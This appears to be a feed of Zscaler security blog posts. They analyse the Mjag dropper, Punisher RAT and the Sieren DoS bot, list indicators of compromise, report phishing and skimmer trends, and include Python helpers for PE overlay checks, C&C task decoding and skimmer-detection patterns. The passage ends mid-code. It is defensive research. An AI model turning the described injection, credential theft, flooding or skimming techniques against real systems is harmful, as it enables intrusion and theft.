Security Posts

Mjag dropper: Using decoy documents to drop RATs

Zscaler Research - 9 min 32 sec ago
Mjag dropper

Mjag dropper is compiled for the Microsoft .NET Framework, and its original binary is obfuscated using SmartAssembly. The installation path and other configuration details are stored AES-encrypted (Fig. 1); the decryption key is hardcoded.

Fig. 1: AES decryption function

The payload and the decoy PDF are encrypted with a custom routine and stored in the resource section. Here, too, the decryption key is hardcoded (Fig. 2).

Fig. 2: Extracting decoy PDF and payload

The decoy document claims to be an Indian Overseas Bank NEFT transaction statement. It lures the user into clicking a "Click here to view full document" link that points to a malicious website hosting a copy of the Mjag dropper payload (Fig. 3).

Fig. 3: Decoy PDF document

Installation

- Copies itself to "%APPDATA%\FolderN\name.exe"
- Creates the startup key "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load" with the value "%APPDATA%\FolderN\name.exe.lnk"
- Copies "C:\Windows\Microsoft.NET\Framework\\msbuild.exe" to "%TMP%\svhost.exe"
- Starts svhost.exe in a suspended state and injects the final payload into it (Fig. 4)

Fig. 4: Process injection using Windows APIs

However, the injected payload does not run properly and displays an error message (Fig. 5).

Fig. 5: Unhandled exception popup

The error is caused by the injector failing to copy the payload's overlay, the data appended after the last section of the PE file, which in this case holds the command-and-control (C&C) server details. As the injection code shows (Fig. 6), it allocates memory in the target process equal to the SizeOfImage value from the payload's PE header, so anything stored beyond the mapped image never reaches the target. Mjag therefore cannot correctly inject payloads, such as Punisher RAT, that keep important data in the overlay.

Fig. 6: Injector code

For the purpose of this blog, we patched the memory-mapping issue and continued our analysis of the infection cycle involving Punisher RAT.

Analysis of Punisher RAT

Punisher RAT is written in .NET and packed. The Punisher RAT builder is publicly available and can be configured with a range of features. In the builder (Fig. 7), the operator sets the server IP, name, password, and listening port; the RAT reports to that server and sends everything it steals from the victim's machine. The builder can also add functionality to the binary, including anti-VMware, anti-AV, sandbox detection, and USB spreading for further infection.

Fig. 7: Punisher RAT builder

During analysis, we saw the following functions of this malware:

1. Password stealing module

The malware hunts through various applications' data and steals stored credentials. In Fig. 8 it is extracting the saved login credentials of the Chrome browser. The stolen information is formatted as:

|URL| http://facebook.com |USR| username or e-mail |PWD| userpassword

Fig. 8: Stealing module

The Punisher RAT attempts to steal sensitive data from the following applications on the infected system: FileZilla, No-IP Dynamic Update Client, Dyn DNS, Paltalk, Firefox, Chrome, Hotmail, Yahoo, Opera, and Internet Explorer.

2. Anti-task manager

The malware watches for the processes of the following tools and prevents them from terminating any other process on the user's system:

Process Explorer
Process Hacker
Task Manager

This lets the malware author ensure that the malware's processes cannot be killed. Fig. 9 shows that when the user attempts to kill the 'a.exe' process from Process Explorer, the "OK" button is replaced by an "Error" button.

Fig. 9: Anti-task manager

3. Keylogging

The malware captures keystrokes (Fig. 10) and stores them in the file %AppData%/{random digits}.log.

Fig. 10: Capturing keystrokes

4. Persistence

The malware copies itself to the Startup folder and creates a Run key pointing to that location:

HKCU\software\microsoft\windows\currentversion\run

5. Spreading vector

It looks for removable drives and CD-ROM drives to infect and drops an .lnk file on them. Fig. 11 depicts the spreading mechanism through a USB device.

Fig. 11: USB spread

6. AV checks

The Punisher RAT checks for installed AV software (Fig. 12) and reports it to the server.

Fig. 12: Checking AV

Network activity

The hardcoded C&C information (Fig. 13) is extracted from the payload by splitting the embedded configuration on the delimiter "abccba".

Fig. 13: C&C server information

It also reports information about running processes, for example:

AW|BawaneH|Process Explorernj-q8
AW|BawaneH|Notepadnj-q8

The RAT uses "BawaneH" as the delimiter to split the server's response data and performs various actions based on the received commands. The server used a total of 59 commands, shown in the following table:

Fig. 14: Received commands

IOCs

MD5: 0a459c18e3b8bdef87a6fb7ea860acdb
Filename: NEFTIOBAN1830369427520181030ABBIdiaLtddt30102018_pdf.exe
Download URL: tenau[.]pw/owa/neftioban1830369427520181030abbidialtddt30102018_pdf.exe
C&C: chris101.ddns.net

Sandbox Report

Fig. 15: Zscaler Sandbox report
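The SizeOfImage problem described above is easy to check for from the defender's side: if a payload has bytes after the end of its last section, a RunPE-style injector that allocates SizeOfImage bytes and copies only the headers and sections will never deliver them. The Python below is an added example, not code from this write-up, from Mjag or from Punisher RAT. It parses the PE headers, computes where the last section's raw data ends, and reports the overlay. The sample PE it builds is constructed for the example (it is not a real sample and is never executed), and the overlay string is a placeholder standing in for the configuration a payload might keep there.

```python
import struct

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def pe_layout(data: bytes) -> dict:
    """Parse a PE file and return its SizeOfImage, the file offset where the
    last section's raw data ends, and the overlay (bytes after that point).

    Only the fields needed for the overlay check are read; nothing is mapped
    or executed.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (size_of_opt,) = struct.unpack_from("<H", data, coff + 16)

    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    # SizeOfImage and SizeOfHeaders sit at the same offsets in PE32 and PE32+.
    (size_of_image,) = struct.unpack_from("<I", data, opt + 56)
    (size_of_headers,) = struct.unpack_from("<I", data, opt + 60)

    # The section table follows the optional header; 40 bytes per entry.
    raw_end = size_of_headers
    sections = opt + size_of_opt
    for i in range(num_sections):
        entry = sections + 40 * i
        size_raw, ptr_raw = struct.unpack_from("<II", data, entry + 16)
        raw_end = max(raw_end, ptr_raw + size_raw)

    raw_end = min(raw_end, len(data))        # tolerate truncated files
    return {
        "size_of_image": size_of_image,
        "raw_end": raw_end,
        "overlay": data[raw_end:],
    }


def overlay_lost_by_image_mapping(data: bytes) -> bool:
    """True when the file carries an overlay. An injector that allocates
    SizeOfImage bytes in the target and copies headers plus sections has
    nowhere to put these trailing bytes, so a payload that keeps its
    configuration there (as Punisher RAT does) starts without it."""
    return len(pe_layout(data)["overlay"]) > 0


def build_sample_pe(overlay: bytes) -> bytes:
    """Construct a minimal PE32 file with one section followed by `overlay`.
    Constructed for this example only; it is not a real sample and is never
    run, it only exercises the parser above."""
    file_align, section_align = 0x200, 0x1000
    size_of_opt = 0xE0                        # PE32 optional header size
    size_of_headers = file_align
    size_of_image = 2 * section_align         # header page + one section page

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew

    # Machine=i386, 1 section, no symbols, optional header size, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_of_opt, 0x0102)

    opt = bytearray(size_of_opt)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<II", opt, 32, section_align, file_align)
    struct.pack_into("<II", opt, 56, size_of_image, size_of_headers)

    sect = bytearray(40)
    sect[:8] = b".text\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", sect, 8, 0x100, section_align, file_align, file_align)
    struct.pack_into("<I", sect, 36, 0x60000020)   # CODE | EXECUTE | READ

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(sect)).ljust(size_of_headers, b"\0")
    body = b"\xC3".ljust(file_align, b"\0")   # a lone RET as filler; never executed
    return headers + body + overlay


if __name__ == "__main__":
    sample = build_sample_pe(b"C2=c2.example.invalid:4444")   # placeholder config
    info = pe_layout(sample)
    print("SizeOfImage=0x%x raw_end=0x%x overlay=%r"
          % (info["size_of_image"], info["raw_end"], info["overlay"]))
    print("lost by SizeOfImage-only mapping:", overlay_lost_by_image_mapping(sample))
```

Run against a real payload, a non-empty overlay is the signal that an injector like Mjag's will truncate it; the patched injector the analysis mentions has to copy those trailing bytes as well, which is why the check uses the end of the last section's raw data rather than SizeOfImage as the boundary.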
Categories: Security Posts

The Top 10 ThreatLabZ blogs from 2018

The Zscaler ThreatLabZ team is continually hunting new threats, analyzing them, and sharing its findings in blogs and reports on the Zscaler site. What follows are the most read and shared blogs of 2018.

Android apps infected with Windows malware reemerge
By Gaurav Shinde
This blog explores apps available on Google Play that were infected with malicious iFrames. Though the malware posed no immediate threat to Android users, its discovery highlights the fact that infections can propagate across platforms: a clever attacker could use this vector to serve a second-stage payload chosen by the platform of the device visiting the URL. Read more.

Fake Fortnite apps scamming and spying on Android gamers
By Viral Gandhi
Fortnite is a co-op sandbox survival game that, at the time of the ThreatLabZ report, had 45 million players and more than three million concurrent users. In 2018, its maker, Epic Games, announced a version for iOS. Malware authors, knowing that Android users would be anxious to get Fortnite, created fake Fortnite for Android apps to spread their payloads, including spyware, a coin miner, and unwanted apps. Read more.

CVE-2017-8570 and CVE-2018-0802 exploits being used to spread LokiBot
By Mohd Sadique
This blog provides an overview of malicious RTF documents that exploit CVE-2017-8570 and CVE-2018-0802 to install payloads on victims' machines, and shares the team's analysis of a campaign using both exploits to deliver LokiBot. Read more.

The latest cloud hosting service to serve malware
By Dhanalakshmi
Cloud services are attractive to bad actors because they can open inexpensive hosting accounts and hide malicious content behind the cloud domains of well-known brands. The ThreatLabZ team discovered that a popular managed cloud hosting provider had been serving phishing pages and other malware in the wild since at least February 2018. Read more.

Meltdown and Spectre vulnerabilities: What you need to know
By Deepen Desai
Meltdown and Spectre allow attackers to gain unauthorized access to sensitive information in system memory. They represent a new class of microarchitectural attacks that abuse processor performance-optimization features such as speculative execution to bypass built-in memory-isolation mechanisms. This blog provides an analysis of the vulnerabilities as well as mitigation information. Read more.

Cryptominers and stealers – malware edition
By Atinderpal Singh and Rajdeepsinh Dodia
Because of their decentralized nature, cryptocurrencies cannot be controlled or censored by any single authority, which makes them attractive to cybercriminals. With more than 4,000 cryptocurrencies on the market rising in both value and popularity, we have seen a rise in malware that targets bitcoins or altcoins for financial gain. This blog provides insight into various cryptominer and stealer variants. Read more.

DarkCloud Bootkit
By Nirmal Singh
Following the report on cryptomining and wallet-stealing techniques, this blog provides a technical analysis of another cryptominer that uses a bootkit and kernel-level shellcode for persistence. Read more.

Spam campaigns leveraging .tk domains
By Mohd Sadique
ThreatLabZ identified a campaign using the ".tk" top-level domain that started with compromised sites redirecting users either to fake blog sites that generate ad revenue or to fake tech support sites claiming to remove viruses. We estimated at the time that the fraudulent ad activity alone was generating at least USD 20K per month. Read more.

Magecart campaign remains active
By Rubin Azad
Magecart is a notorious hacker group responsible for large-scale attacks on the e-commerce sites of well-known brands. In this blog, we examine the campaign's recent activity and its methods for skimming credit and debit card information for financial gain. Read more.

Ubiquitous SEO poisoning URLs
By Jim Wang
SEO poisoning is an attack method that involves creating web pages packed with trending keywords to gain a higher ranking in search results. It is also used to redirect users to unwanted applications, phishing, exploit kits and malware, porn, advertisements, and so on. This blog includes examples and analysis of the techniques in use. Read more.

Sieren: A new DoS bot

Zscaler ThreatLabZ recently discovered a new DoS bot family named Sieren. A denial-of-service (DoS) attack is a cyberattack in which criminals disrupt the service of an internet-connected host, either temporarily or indefinitely, for its intended users. In this analysis, we describe Sieren's functionality and communication, its 10 DoS methods, its bot commands, and its IoCs.

Functionality

Sieren is capable of performing HTTP, HTTPS, and UDP flooding against any target as instructed by the command-and-control (C&C) server:

HTTP flood
HTTPS flood
UDP flood

Network communication

Sieren starts communication with the server by sending system information, with fields separated by the "&" symbol:

ping
User name
Machine name
OS version
Processor architecture (0 if 32-bit, otherwise 1)
MD5 of the above data

In response, the C&C server sends a target for the DoS attack, again with fields separated by "&":

pong
60: sleep interval (60 * 1000 milliseconds)
Task_ID = 260
Method = 2
Target = https://deti-online[.]com/
Type = GET
Threads = 100
Sleep = 100
Port = 0
Sockets = 0 (number of sockets)
Size = 0 (size of data sent per packet during the DoS)
CreatedAT = Timestamp
Data = Empty (data sent in each packet during the DoS)

The malware can attack the target URL using different methods. The variant we analyzed supports 10 flooding methods and chooses one based on the data received from the C&C server. In the instance above, a Russian educational website (https://deti-online[.]com) was the intended target. During our analysis we also saw the C&C server hand out forum.exlpoit[.]in and x3p0[.]xyz as DoS targets.

The parameters each method uses are shown below ("-" means the method ignores that field):

Method | Task_ID | Target | Type (GET/POST) | Threads | Sleep | Data | Sockets | Port | Size
1  | Yes | Yes | Yes | Yes | Yes | -   | -   | -   | -
2  | Yes | Yes | Yes | -   | Yes | -   | -   | -   | -
3  | Yes | Yes | Yes | -   | -   | -   | -   | -   | -
4  | Yes | Yes | -   | -   | Yes | Yes | -   | -   | -
5  | Yes | Yes | -   | -   | Yes | -   | -   | -   | -
6  | Yes | Yes | -   | -   | -   | -   | Yes | Yes | -
7  | Yes | Yes | -   | -   | -   | -   | Yes | Yes | -
8  | Yes | Yes | -   | -   | -   | -   | Yes | Yes | Yes
9  | Yes | Yes | -   | -   | -   | -   | -   | Yes | Yes
10 | Yes | Yes | -   | -   | -   | -   | -   | Yes | Yes

The C&C server can specify the port, data, sleep time, number of sockets, and packet size used during flooding. During flooding, a user agent is selected randomly from a predefined list, as shown below.

DoS methods supported by Sieren

Method 1: The malware first obtains the cookies for the target URL using InternetGetCookieEx and includes them in the HTTP header of the flood requests. Based on the protocol (HTTP/HTTPS) and the request method (POST/GET), it starts sending multiple requests to the target URL. The screenshots below show the code that builds the header, the HTTP flooding code, and the HTTPS flooding code.

Method 2: The malware creates 50 sockets and sends 50 HTTP requests, then sleeps for the interval supplied by the C&C server. It repeats this for as long as the task ID remains active.

Method 3: Similar to Method 2, but the bot does not sleep after every 50 requests.

Method 4: The bot includes the data supplied by the C&C server in the flood requests to the target URL.

Method 5: The bot also reads the response while flooding the target URL, then sleeps for 100 seconds before resuming the flood.

Method 6: Used when the C&C server specifies the number of sockets and the port. The bot does not send HTTP or HTTPS requests; instead it opens multiple sockets to the target in an attempt to exhaust server-side resources, repeatedly closing and reopening sockets for as long as the task ID remains active.

Method 7: Identical to Method 6; it appears to be a placeholder for a future update.

Method 8: The bot receives the size of the random data, the number of sockets, and the port from the C&C server. It generates random data of the specified size, opens multiple sockets, and floods the target with the random data.

Method 9: The C&C server supplies the size of the random data and the port. The bot generates random data and floods the target on the specified port.

Method 10: UDP-based flooding. The bot sends random data over UDP and sets the TTL (time to live) of these packets to a value between 220 and 225.

The bot stops flooding once the C&C server stops sending commands.

Sieren bot commands

Besides the DoS methods, the malware supports three additional commands:

"dlexec": download a payload from the URL given by the C&C server and execute it.
"update": download the updated version and execute it, then delete the current binary using cmd.
"Uninstall": delete itself using cmd.

Indicators of Compromise

MD5: 320A600147693B3D135ED453FAC42E82
URLs:
cx93835[.]tmweb.ru/rrljw91zqd.exe
burgerkingfanbase[.]net/great.php
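For anyone emulating the C&C in a sandbox or decoding captured traffic, the useful pieces above are the "pong" task layout and the per-method parameter table. The Python below is an added example, not code from this analysis or from the bot: it splits a task on "&" in the field order listed above (the exact wire order is an assumption reconstructed from that list), types the numeric fields, classifies the flood by what it puts on the wire, and reports which of the parameters the chosen method needs were left empty or zero. The sample task strings are constructed for the example and point at an RFC 5737 documentation address, not a real target.

```python
"""Decode Sieren 'pong' tasks and check them against the per-method parameter table."""

# Field order as listed in the analysis above (assumption about the wire order).
FIELDS = ("reply", "poll", "task_id", "method", "target", "type", "threads",
          "sleep", "port", "sockets", "size", "created_at", "data")
INT_FIELDS = {"poll", "task_id", "method", "threads", "sleep", "port", "sockets", "size"}

# Parameters each flooding method consumes, per the table above. Task_ID and
# Target are used by every method; Target is checked separately below.
REQUIRED = {
    1: ("type", "threads", "sleep"),
    2: ("type", "sleep"),
    3: ("type",),
    4: ("sleep", "data"),
    5: ("sleep",),
    6: ("sockets", "port"),
    7: ("sockets", "port"),
    8: ("sockets", "port", "size"),
    9: ("port", "size"),
    10: ("port", "size"),
}


def flood_class(method: int) -> str:
    """Group the ten methods by what they put on the wire."""
    if 1 <= method <= 5:
        return "http"         # HTTP/HTTPS request floods
    if 6 <= method <= 9:
        return "tcp-socket"   # socket exhaustion / random data over TCP
    if method == 10:
        return "udp"          # UDP flood with TTL 220-225
    raise ValueError("unknown Sieren method %d" % method)


def parse_task(response: str) -> dict:
    """Turn one '&'-separated pong response into a typed task description."""
    parts = response.split("&")
    if len(parts) != len(FIELDS) or parts[0] != "pong":
        raise ValueError("not a Sieren pong task")
    task = dict(zip(FIELDS, parts))
    for name in INT_FIELDS:
        task[name] = int(task[name]) if task[name] else 0
    task["poll_ms"] = task["poll"] * 1000          # bot sleeps poll * 1000 ms
    task["flood_class"] = flood_class(task["method"])
    needed = ("target",) + REQUIRED[task["method"]]
    # An empty string or 0 means the C&C did not set the parameter.
    task["missing"] = [p for p in needed if not task[p]]
    return task


def describe(task: dict) -> str:
    """One-line summary suitable for an analysis log."""
    line = "task %d: method %d (%s) against %s" % (
        task["task_id"], task["method"], task["flood_class"], task["target"] or "<none>")
    if task["missing"]:
        line += " [missing: %s]" % ", ".join(task["missing"])
    return line


# Constructed sample tasks (documentation address 203.0.113.10, not a real target).
SAMPLE_HTTP = "pong&60&260&2&http://203.0.113.10/&GET&100&100&0&0&0&1543622400&"
SAMPLE_UDP = "pong&60&261&10&203.0.113.10&&0&0&53&0&512&1543622400&"
SAMPLE_BAD = "pong&60&262&8&203.0.113.10&&0&0&0&0&512&1543622400&"   # method 8 without sockets/port

if __name__ == "__main__":
    for raw in (SAMPLE_HTTP, SAMPLE_UDP, SAMPLE_BAD):
        print(describe(parse_task(raw)))
```

The "missing" list is the practical part: a task whose method needs a port or socket count that the C&C left at zero tells you either that the field order assumed here is wrong for the sample in hand or that the operator mis-issued the task, and both are worth knowing before replaying traffic to the bot.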

2019 Will See Cybercriminals Eye Opportunities in Cryptocurrency and IoT to Launch Their Attacks

Cybercriminals never take vacations. They are always scanning the horizon for new technologies being adopted by legitimate enterprises, and therefore ripe for exploitation, or for ways to abuse trusted protocols to steal the credentials of unsuspecting consumers. The coming year will be no different, but in some cases the tools will change. Here are my predictions for the cybercrime trends that will get our attention in 2019.

Prediction #1: Malware operators will cash in on cryptocurrency

We will continue to see more malware operators make money from cryptocurrency, either by mining coins on infected systems or by stealing cryptocurrency from them, with new and existing malware strains adding cryptomining and stealing functionality. The three most common types of crypto-malware are cryptominers, wallet stealers, and clipboard hijackers, and we expect all three to increase. Here is how they work:

Cryptominer malware, once downloaded, works in the background, stealing CPU cycles to mine digital currency such as bitcoin without the user's knowledge or consent. By spreading their malware across thousands of machines, the operators assemble what amounts to a mining pool, which can yield big payoffs for the malware author. In 2018, cryptomining surpassed ransomware to become one of the top threats, and we expect that trend to continue.

Wallet stealing will increase too, in both frequency and sophistication. Wallets do not store the cryptocurrency itself; they store the keys needed to access or spend funds recorded on the blockchain. Expect new variants with the functionality to locate and steal wallet.dat files.

Clipboard hijacking is a more recent innovation. Because cryptocurrency wallet addresses are long, random-looking strings of alphanumeric characters, they are hard to remember, so almost all cryptocurrency owners copy and paste the destination address when making a transaction. On an infected system, malware can watch the clipboard for an address and silently replace it with one belonging to the malware operator, so the funds go to the attacker instead.

Prediction #2: SSL/TLS-delivered threats will become more common

We have seen steady growth in overall SSL/TLS-encrypted traffic this year; it now accounts for almost 75 percent of the total enterprise traffic going through the Zscaler cloud. Cybercriminals are leveraging this encrypted channel at every stage of the kill chain, and in particular there has been a sharp increase in phishing attacks and malware payload delivery over encrypted channels. In the latter half of 2018 alone, 35 percent of the phishing content we saw was delivered over encrypted channels, a 300 percent increase since 2016.

Although the volume of SSL/TLS-encrypted traffic has risen sharply, much of it goes uninspected, either because it is assumed to come from trusted sources or, more likely, because of the performance impact inspection would have on the network. Attackers can hide malware in encrypted traffic knowing it is unlikely to be inspected. In 2019 we will continue to see cybercriminals use SSL/TLS to launch attacks, and we anticipate more phishing attacks and malware payload deliveries over these channels as attackers take advantage of the trust users place in encryption and of the ease with which they can obtain digital certificates.

Prediction #3: IoT threats will have a greater impact on enterprises

The IoT footprint in enterprise networks has grown rapidly over the past few years, and these internet-connected devices pose significant risks to those networks. We will continue to see cybercriminals use IoT devices as a beachhead for large-scale attacks against enterprise networks. Some of the largest attacks on record are the result of hackers using IoT devices to carry out massive distributed-denial-of-service (DDoS) attacks. IoT devices have notoriously poor security, with known default passwords that are rarely changed, and manufacturers are slow to patch vulnerabilities. In addition to employee-owned devices coming into the workplace, organizations are adding hundreds or even thousands of IoT devices to their environments: cameras, printers, IP phones, televisions, kitchen appliances, thermostats, and more.

Besides DDoS, IoT vulnerabilities are being used as an entry point into a network, from which attackers hop from one vulnerable device to the next undetected. Once an attacker gains a toehold in a network through a compromised device, it can be used to spread malware, steal credentials, leak data, and sniff traffic. Unfortunately, until manufacturers take the threat seriously and bake security into their devices, these attacks will continue to rise in 2019 and beyond. US-CERT (the United States Computer Emergency Readiness Team) has published security tips for IoT devices.

Prediction #4: Supply-chain attacks will grow

There has been a steady increase in software supply-chain attacks in recent years. These attacks used to be targeted, singling out a specific industry or organization, such as government. Now we are seeing software supply-chain attacks used to distribute commodity malware as well, which has the potential to affect far larger numbers of users. We will see cybercriminals continue to focus on compromising critical software supply-chain infrastructure to conduct larger attacks.

An example of the fast and massive damage a software supply-chain attack can inflict is the June 2017 NotPetya attack. The initial infection came through an accounting software website and, by the end, it had wiped data from many thousands of computers around the world at banks, energy firms, governments, and more. Not only is a company's valuable data and IP at risk, so is its reputation, which in the end hits its bottom line. NotPetya appeared to be a state-sponsored attack, but most supply-chain attacks are the result of poor security hygiene, which attackers are always prepared to exploit.

Prediction #5: Criminals will turn their attention to cloud service providers

The increase in cloud adoption has shifted many workflows to the cloud. With that shift, we will see more attacks aimed at infiltrating cloud service providers in an attempt to reach the valuable data of the organizations using their services. Given the volume of data companies now store in public clouds, these attacks can have far-reaching impact and severe financial consequences.

The cloud service providers themselves have invested heavily in security and have large security teams to keep their systems sound; they are far more secure than the typical enterprise data center. But many cloud services and their configurations are new and evolving, and mistakes such as the widely publicized S3 bucket misconfigurations have exposed sensitive data at many organizations. The most common source of errors leading to data leaks or the spread of malware, however, is the end user. Your cloud storage may be impenetrable, but there is always the risk that employees will be careless with their credentials, enabling bad actors to access your data. In 2019, we expect an increase in social engineering attacks aimed specifically at employees who access cloud applications.

Cyber Monday: The biggest day for cyberattacks? Not by a long shot.

Last week, the Zscaler ThreatLabZ research team analyzed the phishing attacks we had seen in our cloud in the run-up to Black Friday and Cyber Monday. The team had been seeing an increase in a variety of phishing activity, with targeted attacks and faked login pages designed to steal the credentials of unsuspecting shoppers. (Their report, the ThreatLabZ Phishing Roundup, is listed under More resources below.)

With Black Friday and Cyber Monday behind us, we took another look at the data to measure the volume of shopping activity across our cloud and the rise in threat activity one would expect to coincide with major online events.

What we found was that Cyber Monday was, indeed, the biggest shopping day of the year on our cloud and elsewhere. According to the National Retail Federation, 50 million people shopped online in the U.S. alone. Amazon reported that Cyber Monday was its biggest shopping day in history, and over the five days from Thanksgiving through Monday, Amazon customers bought more than 180 million items.

What we saw more than a billion times

We can attest to the high volume of shopping activity. On Cyber Monday, the Zscaler cloud processed 1.35 billion requests to shopping sites, with the highest volume by far going to Amazon, at 372,824,847 requests. While Monday's shopping traffic represented only 2.18 percent of the overall traffic on our cloud, it was 72 percent higher than shopping traffic on a typical day.

Cyber Monday top five shopping sites on the Zscaler cloud:

Number of requests we processed on Cyber Monday's top shopping sites.

With so much shopping activity, you might think that Black Friday and Cyber Monday would be the days cybercriminals crank up the volume, launching phishing attacks and spreading malware to online shoppers. The traffic patterns on our cloud show otherwise.

Phishing attacks are planned and executed with precision

On Cyber Monday, we blocked a total of 2,337,537 phishing attempts. That is significant, but the number was actually down from the days before Black Friday, and the decrease is consistent with patterns we have seen before: attacks peak in the days leading up to major events or shopping days. Attackers schedule their phishing campaigns for the days when potential victims are looking for deals, aligning them with mainstream advertising campaigns. On the "big day," when shoppers have already decided which sites to visit, the attacks drop off accordingly.

We blocked the highest numbers of phishing attempts on the three days before Thanksgiving, with a peak of 4.4 million on Wednesday. By Black Friday, attacks had dropped by nearly 30% from that high, and they continued to decrease through Monday, when attacks were down 46% from Wednesday.

November graph shows daily phishing attempts on the Zscaler cloud

Why did attacks drop on Cyber Monday?

It has been a long time since hackers could be stereotyped as nerds in a basement using their programming skills to bootleg videos. Today's criminals are sophisticated in their technical execution and in their understanding of market drivers and user behavior. They operate their campaigns like big businesses, because they are. They know when you are most likely to be online and when you will be sifting through the most email (Monday is the most popular day for phishing attacks). They know you are more likely to open tracking slips or invoices than an unknown attachment. And they exploit the trust you have in brands like Amazon, Kohl's, Bank of America, and many others by creating fake websites that look just like the real thing.

Consumers must change their online behavior accordingly, approaching each online interaction with an awareness of its potential risk. You cannot assume that attachments are safe even if you recognize the sender's name; spoofing names is practically effortless. You cannot assume that text messages are safe either, given the rise in SMS phishing: so-called "SMiShing" links can take you to compromised websites just as infected email attachments can.

E-commerce websites can be compromised in a variety of ways. Hackers can inject JavaScript into a site so that the script sends the data collected in input fields to the hacker's remote server. A favorite tactic is creating sites that look like legitimate sites but are designed to steal your personal information. Can you tell the difference between these two Amazon login screens?

The screen on the left is the login of a phishing site that will collect your personal information, including your credit card number, while you think you are on the Amazon site the whole time. The one on the right is the real Amazon login screen. The only difference is in the address bar, so be sure the site you are on matches the URL in the address bar.

We also know, as stated earlier, that today's cybercriminals plan their campaigns with a marketer's precision. It is wise to take extra precautions leading up to and during big events or news days (another November day on which we saw a surge in phishing activity was the sixth, U.S. election day).

Three things you can do right now to protect yourself from phishing:

Check the authenticity of the URL or website address before clicking a link; make sure the address matches the site you intend to visit
Ensure online retailers and banking sites use secure connections; the URL should start with HTTPS (and remember that HTTPS alone does not prove a site is legitimate, since phishing sites obtain certificates too)
Inspect the source of emails with enticing shopping deals; be wary of all links and attachments

More resources:

Read the ThreatLabZ Phishing Roundup blog for an analysis of current phishing trends
Download the infographic

Black Friday & Cyber Monday Deals: Phishing and Site Skimmers

It's that time of year again! The most glorious of shopping seasons has arrived, and users have begun their annual tradition of flooding e-stores in search of the best deals their money can buy. Threat actors, keen to take advantage of the increased seasonal shopping activity, are deploying targeted phishing campaigns and site skimmers in the hope of cashing in. The attacks reach users in nearly every part of their online presence: email, tweets, and websites are all vehicles of abuse. Zscaler has seen a steady rise in phishing attacks leading up to Black Friday and Cyber Monday, and we provide an overview of them here.

Fig. 1: Malicious activity from mid-October through mid-November. The turquoise bars represent targeted phishing attacks.

Targeted phishing

Examining one of the targeted phishing campaigns illustrates the need for caution when shopping online. The faked Amazon screen is the perfect example, because Amazon is probably the most heavily used online shopping site during the holidays. Aside from the address bar, it is a relatively good knock-off.

Fig. 2: Faked Amazon sign-in form.

This attack does not stop at your Amazon credentials; the site also wants your credit card information.

Fig. 3: Faked Amazon billing page.

A closer look shows that the attackers do not even bother to encrypt the stolen credentials in transit: the form data travels to their server over plain HTTP.

Fig. 4: Wireshark exposes the packets moving between client and server over HTTP.

The best defense is to always be conscious of the address bar. A store like Amazon will never ask you for sensitive information away from the Amazon site.

Site skimmers

Other sophisticated attacks that have proven even more insidious are site skimmers such as MageCart. MageCart refers to a hacker group responsible for large-scale attacks on e-commerce sites. MageCart compromises a well-known or trusted site and injects malicious, obfuscated JavaScript that taps into purchases. The injected script adds a form to the payment page at runtime through the Document Object Model (DOM). The information skimmed by this attack can include all the personal information requested by the compromised e-commerce page. This type of attack is detailed in another blog.

Despite several security vendors taking notice, users are still being affected daily. An updated chart of MageCart hits since our September 28 blog shows that this attack is not stopping anytime soon.

Fig. 5: MageCart activity between September 20 and November 15.

The best defense against this threat is a malware detection tool that sits inline with the browser; such tools have the best chance of detecting the malicious JavaScript on an online store's page.

Cryptocurrency mining

The final attack we review is cryptojacking. Unlike the other attacks discussed, cryptojacking does not target the user's sensitive information but rather their system resources. A small piece of JavaScript injected into a page uses the user's browser to mine cryptocurrency for the attacker, and attackers are leveraging the shopping season to bolster their crypto wallets.

Fig. 6: An online shopping aggregator linking to Amazon while redirecting users' systems to mine the Monero cryptocurrency.

Behind the scenes, this shopping site carries a small piece of JavaScript that redirects the user's system resources to mine cryptocurrency through the Coinhive service.

Fig. 7: The Coinhive injection script uses the user's system resources to mine the cryptocurrency Monero.

The best defense against this kind of attack is a JavaScript-blocking browser extension such as ScriptSafe or NoScript, which lets you choose which sites may execute JavaScript.
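Both the skimmer and the cryptojacking cases above come down to the same question for a site owner or an inline proxy: which scripts is a checkout page actually loading, and does any inline code both read payment fields and ship them somewhere? The Python below is an added example, not code from this post or from any product. It walks a page's script tags, flags scripts served from a host other than the page's own (minus an allowlist you supply), flags inline code that touches form values or injects form elements and also sends data off the page (Image beacon, fetch, XMLHttpRequest, sendBeacon, WebSocket), and flags any reference to the Coinhive miner named above. The HTML it checks is constructed for the example; apart from the coinhive.com include, which mirrors how that service was embedded, the hostnames in it are placeholders. It is a triage heuristic, not a detector: an obfuscated skimmer will not match these patterns.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Heuristics: reading payment fields or injecting form elements at runtime...
READS = re.compile(r"\.value\b|document\.forms|new\s+FormData|createElement\(\s*['\"](?:form|input)")
# ...combined with any primitive that gets data off the page.
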